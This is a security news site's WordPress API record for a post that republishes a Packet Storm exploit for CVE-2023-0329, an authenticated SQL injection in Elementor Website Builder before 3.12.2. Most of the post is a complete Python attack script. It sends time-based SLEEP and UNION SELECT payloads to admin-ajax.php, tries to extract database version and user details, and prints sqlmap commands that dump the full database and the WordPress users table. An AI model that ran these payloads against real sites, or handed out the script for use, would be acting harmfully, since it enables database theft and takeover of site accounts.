{"id":30767,"date":"2025-12-12T11:58:35","date_gmt":"2025-12-12T11:58:35","guid":{"rendered":"http:\/\/localhost\/?p=30767"},"modified":"2025-12-12T11:58:35","modified_gmt":"2025-12-12T11:58:35","slug":"elementor-website-builder-sql-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=30767","title":{"rendered":"\ud83d\udcc4 Elementor Website Builder SQL Injection_PACKETSTORM:212773"},"content":{"rendered":"

{“lastseen”:”2025-12-12T17:14:54″,”description”:”Proof of concept exploit that demonstrates a remote SQL injection vulnerability in Elementor Website Builder versions prior 3.12.2…”,”published”:”2025-12-12T00:00:00″,”modified”:”2025-12-12T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Elementor Website Builder SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:212773″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2023-0329″],”sourceData”:”=============================================================================================================================================\\n | # Title : Elementor Website Builder \\u003c 3.12.2 – Admin+ SQL Injection Exploit |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/elementor.com\/ |\\n =============================================================================================================================================\\n \\n POC : \\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/175639\/ \\u0026 \\tCVE-2023-0329\\n \\n \\n [+] Summary : \\n \\n an authenticated SQL Injection vulnerability in Elementor Website Builder versions prior to 3.12.2. \\n \\t\\t The vulnerability allows authenticated attackers with at least author-level privileges to execute arbitrary SQL commands, potentially leading to complete database compromise.\\n \\t\\t The vulnerability exists in the AJAX request handler where user input in the data parameter is not properly sanitized before being used in SQL queries.\\n \\t\\n [+] POC : python poc.py\\n \\n #!\/usr\/bin\/env python3\\n \\”\\”\\”\\n Elementor Website Builder \\u003c 3.12.2 SQL Injection Exploit (CVE-2023-0329)\\n Author: indoushka\\n \\”\\”\\”\\n \\n import requests\\n import time\\n import sys\\n import urllib3\\n from argparse import ArgumentParser\\n \\n # Disable SSL warnings\\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\\n \\n class ElementorExploit:\\n def __init__(self, target, cookies=None, auth_token=None):\\n self.target = target.rstrip(‘\/’)\\n self.session = requests.Session()\\n self.cookies = cookies\\n self.auth_token = auth_token\\n \\n self.session.headers.update({\\n ‘User-Agent’: ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’,\\n ‘Content-Type’: ‘application\/x-www-form-urlencoded’,\\n ‘X-Requested-With’: ‘XMLHttpRequest’\\n })\\n \\n if self.cookies:\\n self.session.cookies.update(self.cookies)\\n \\n def check_vulnerability(self):\\n \\”\\”\\”Check if target is vulnerable to SQL Injection\\”\\”\\”\\n print(f\\”[*] Checking vulnerability for: {self.target}\\”)\\n \\n # Time-based SQL injection payload\\n payloads = [\\n \\”test’),meta_key=’key4’where+meta_id=SLEEP(5);#\\”,\\n \\”test’ AND (SELECT * FROM (SELECT(SLEEP(5)))a)– \\”,\\n \\”test’ AND SLEEP(5) AND ‘1’=’1\\”\\n ]\\n \\n for payload in payloads:\\n url = f\\”{self.target}\/wp-admin\/admin-ajax.php\\”\\n \\n data = {\\n \\”action\\”: \\”elementor_ajax_save_builder\\”,\\n \\”editor_post_id\\”: \\”1\\”,\\n \\”post_id\\”: \\”1\\”,\\n \\”data\\”: payload\\n }\\n \\n # Add auth token if provided\\n if self.auth_token:\\n data[‘_wpnonce’] = self.auth_token\\n \\n try:\\n start_time = time.time()\\n response = self.session.post(url, data=data, timeout=10, verify=False)\\n end_time = time.time()\\n \\n response_time = end_time – start_time\\n \\n if response_time \\u003e= 5:\\n print(f\\”[+] Time-based SQL Injection confirmed! (Delay: {response_time:.2f}s)\\”)\\n print(f\\”[+] Payload: {payload}\\”)\\n return True\\n else:\\n print(f\\”[-] No delay with payload: {payload}\\”)\\n \\n except requests.exceptions.Timeout:\\n print(f\\”[+] Request timeout – possible SQL injection success\\”)\\n return True\\n except Exception as e:\\n print(f\\”[-] Error with payload {payload}: {e}\\”)\\n \\n return False\\n \\n def exploit_union(self):\\n \\”\\”\\”Union-based data extraction\\”\\”\\”\\n print(\\”[*] Attempting UNION-based data extraction\\”)\\n \\n # First, determine number of columns\\n for col_count in range(1, 10):\\n nulls = ‘,’.join([str(i) for i in range(1, col_count + 1)])\\n payload = f\\”test’ UNION SELECT {nulls}– \\”\\n \\n url = f\\”{self.target}\/wp-admin\/admin-ajax.php\\”\\n data = {\\n \\”action\\”: \\”elementor_ajax_save_builder\\”,\\n \\”editor_post_id\\”: \\”1\\”, \\n \\”post_id\\”: \\”1\\”,\\n \\”data\\”: payload\\n }\\n \\n if self.auth_token:\\n data[‘_wpnonce’] = self.auth_token\\n \\n try:\\n response = self.session.post(url, data=data, timeout=10, verify=False)\\n \\n # Check for successful UNION\\n if response.status_code == 200 and \\”error\\” not in response.text.lower():\\n print(f\\”[+] UNION successful with {col_count} columns\\”)\\n \\n # Extract database information\\n self.extract_database_info(col_count)\\n return True\\n \\n except Exception as e:\\n print(f\\”[-] Error with {col_count} columns: {e}\\”)\\n \\n return False\\n \\n def extract_database_info(self, column_count):\\n \\”\\”\\”Extract database information using UNION\\”\\”\\”\\n print(\\”[*] Extracting database information…\\”)\\n \\n # Extract database version\\n version_payloads = [\\n f\\”test’ UNION SELECT 1,@@version,{‘,’.join([str(i) for i in range(3, column_count + 1)])}– \\”,\\n f\\”test’ UNION SELECT 1,version(),{‘,’.join([str(i) for i in range(3, column_count + 1)])}– \\”,\\n f\\”test’ UNION SELECT 1,user(),{‘,’.join([str(i) for i in range(3, column_count + 1)])}– \\”\\n ]\\n \\n for payload in version_payloads:\\n url = f\\”{self.target}\/wp-admin\/admin-ajax.php\\”\\n data = {\\n \\”action\\”: \\”elementor_ajax_save_builder\\”,\\n \\”editor_post_id\\”: \\”1\\”,\\n \\”post_id\\”: \\”1\\”, \\n \\”data\\”: payload\\n }\\n \\n if self.auth_token:\\n data[‘_wpnonce’] = self.auth_token\\n \\n try:\\n response = self.session.post(url, data=data, timeout=10, verify=False)\\n if response.status_code == 200:\\n print(\\”[+] Database information extracted successfully\\”)\\n # Parse response for version\/user info\\n break\\n except Exception as e:\\n print(f\\”[-] Error extracting info: {e}\\”)\\n \\n def generate_sqlmap_commands(self):\\n \\”\\”\\”Generate sqlmap commands for automated exploitation\\”\\”\\”\\n print(\\”\\\\n[+] SQLMap Commands:\\”)\\n print(\\”=\\” * 60)\\n \\n target_url = f\\”{self.target}\/wp-admin\/admin-ajax.php\\”\\n \\n print(\\”# Basic detection (with auth):\\”)\\n print(f’sqlmap -u \\”{target_url}\\” –data=\\”action=elementor_ajax_save_builder\\u0026editor_post_id=1\\u0026post_id=1\\u0026data=test\\” –cookie=\\”[COOKIES]\\” –batch’)\\n \\n print(\\”\\\\n# Full database dump:\\”)\\n print(f’sqlmap -u \\”{target_url}\\” –data=\\”action=elementor_ajax_save_builder\\u0026editor_post_id=1\\u0026post_id=1\\u0026data=test\\” –cookie=\\”[COOKIES]\\” –batch –dump-all’)\\n \\n print(\\”\\\\n# Extract WordPress users:\\”)\\n print(f’sqlmap -u \\”{target_url}\\” –data=\\”action=elementor_ajax_save_builder\\u0026editor_post_id=1\\u0026post_id=1\\u0026data=test\\” –cookie=\\”[COOKIES]\\” –batch -D wordpress -T wp_users –dump’)\\n \\n def comprehensive_scan(self):\\n \\”\\”\\”Run comprehensive vulnerability assessment\\”\\”\\”\\n print(\\”[*] Starting comprehensive Elementor SQLi scan…\\”)\\n \\n # Check authentication\\n if not self.cookies and not self.auth_token:\\n print(\\”[-] No authentication provided – some tests may fail\\”)\\n \\n # Check vulnerability\\n if self.check_vulnerability():\\n print(\\”\\\\n[+] Target is VULNERABLE to SQL Injection\\”)\\n \\n # Attempt data extraction\\n print(\\”\\\\n[*] Attempting data extraction…\\”)\\n self.exploit_union()\\n \\n # Generate sqlmap commands\\n self.generate_sqlmap_commands()\\n else:\\n print(\\”\\\\n[-] Target does not appear to be vulnerable\\”)\\n \\n def main():\\n banner = \\”\\”\\”\\n \\n \u2588\u2588\u2557\u2588\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \\n \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2554\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\\n \u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588 \u2588\u2554\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2554\u255d \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\\n \u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2588\u2588\u2557 \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\\n \u2588\u2588\u2551\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551\\n \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\\n \\n Elementor Website Builder SQL Injection Exploit (CVE-2023-0329)\\n By: indoushka\\n \\”\\”\\”\\n print(banner)\\n \\n parser = ArgumentParser(description=’Elementor SQL Injection Exploit’)\\n parser.add_argument(‘-u’, ‘–url’, required=True, help=’Target URL (e.g., https:\/\/example.com)’)\\n parser.add_argument(‘-c’, ‘–cookies’, help=’Authentication cookies (e.g., \\”wordpress_logged_in=xxx\\”)’)\\n parser.add_argument(‘-t’, ‘–token’, help=’WordPress nonce token’)\\n parser.add_argument(‘–check’, action=’store_true’, help=’Check vulnerability only’)\\n parser.add_argument(‘–exploit’, action=’store_true’, help=’Run full exploitation’)\\n parser.add_argument(‘–sqlmap’, action=’store_true’, help=’Generate sqlmap commands’)\\n \\n args = parser.parse_args()\\n \\n # Parse cookies if provided\\n cookies_dict = {}\\n if args.cookies:\\n for cookie in args.cookies.split(‘;’):\\n if ‘=’ in cookie:\\n key, value = cookie.strip().split(‘=’, 1)\\n cookies_dict[key] = value\\n \\n exploit = ElementorExploit(args.url, cookies=cookies_dict, auth_token=args.token)\\n \\n if args.check:\\n if exploit.check_vulnerability():\\n print(\\”\\\\n[!] Target is VULNERABLE to SQL Injection\\”)\\n else:\\n print(\\”\\\\n[!] Target does not appear to be vulnerable\\”)\\n \\n elif args.exploit:\\n exploit.comprehensive_scan()\\n \\n elif args.sqlmap:\\n exploit.generate_sqlmap_commands()\\n \\n else:\\n # Default: comprehensive scan\\n exploit.comprehensive_scan()\\n \\n if __name__ == \\”__main__\\”:\\n if len(sys.argv) == 1:\\n print(\\”Usage: python elementor_exploit.py -u https:\/\/target.com\\”)\\n print(\\”Options: –check, –exploit, –sqlmap\\”)\\n print(\\”Authentication: -c ‘wordpress_logged_in=xxx’ -t [nonce_token]\\”)\\n sys.exit(1)\\n \\n main()\\n \\t\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212773″,”cvss”:{“score”:7.2,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:H\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212773\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-12-12T17:14:54″,”description”:”Proof of concept exploit that demonstrates a remote SQL injection vulnerability in Elementor Website Builder versions prior 3.12.2…”,”published”:”2025-12-12T00:00:00″,”modified”:”2025-12-12T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Elementor Website Builder SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:212773″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2023-0329″],”sourceData”:”=============================================================================================================================================\\n | #…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,39,12,15,13,53,7,11,5],"class_list":["post-30767","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-72","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Elementor Website Builder SQL Injection_PACKETSTORM:212773 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=30767\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Elementor Website Builder SQL Injection_PACKETSTORM:212773 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-12-12T17:14:54″,”description”:”Proof of concept exploit that demonstrates a remote SQL injection vulnerability in Elementor Website Builder versions prior 3.12.2…”,”published”:”2025-12-12T00:00:00″,”modified”:”2025-12-12T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Elementor Website Builder SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:212773″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2023-0329″],”sourceData”:”=============================================================================================================================================n | #...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=30767\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-12T11:58:35+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30767#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30767\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Elementor Website Builder SQL Injection_PACKETSTORM:212773\",\"datePublished\":\"2025-12-12T11:58:35+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30767\"},\"wordCount\":1462,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.2\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=30767#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30767\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30767\",\"name\":\"\ud83d\udcc4 Elementor Website Builder SQL Injection_PACKETSTORM:212773 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-12T11:58:35+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30767#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=30767\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=30767#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Elementor Website Builder SQL Injection_PACKETSTORM:212773\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Elementor Website Builder SQL Injection_PACKETSTORM:212773 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=30767","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Elementor Website Builder SQL Injection_PACKETSTORM:212773 - zero redgem","og_description":"{“lastseen”:”2025-12-12T17:14:54″,”description”:”Proof of concept exploit that demonstrates a remote SQL injection vulnerability in Elementor Website Builder versions prior 3.12.2…”,”published”:”2025-12-12T00:00:00″,”modified”:”2025-12-12T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Elementor Website Builder SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:212773″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2023-0329″],”sourceData”:”=============================================================================================================================================n | #...","og_url":"https:\/\/zero.redgem.net\/?p=30767","og_site_name":"zero redgem","article_published_time":"2025-12-12T11:58:35+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=30767#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=30767"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Elementor Website Builder SQL Injection_PACKETSTORM:212773","datePublished":"2025-12-12T11:58:35+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=30767"},"wordCount":1462,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.2","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=30767#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=30767","url":"https:\/\/zero.redgem.net\/?p=30767","name":"\ud83d\udcc4 Elementor Website Builder SQL Injection_PACKETSTORM:212773 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-12T11:58:35+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=30767#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=30767"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=30767#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Elementor Website Builder SQL Injection_PACKETSTORM:212773"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/30767","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=30767"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/30767\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=30767"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=30767"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=30767"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}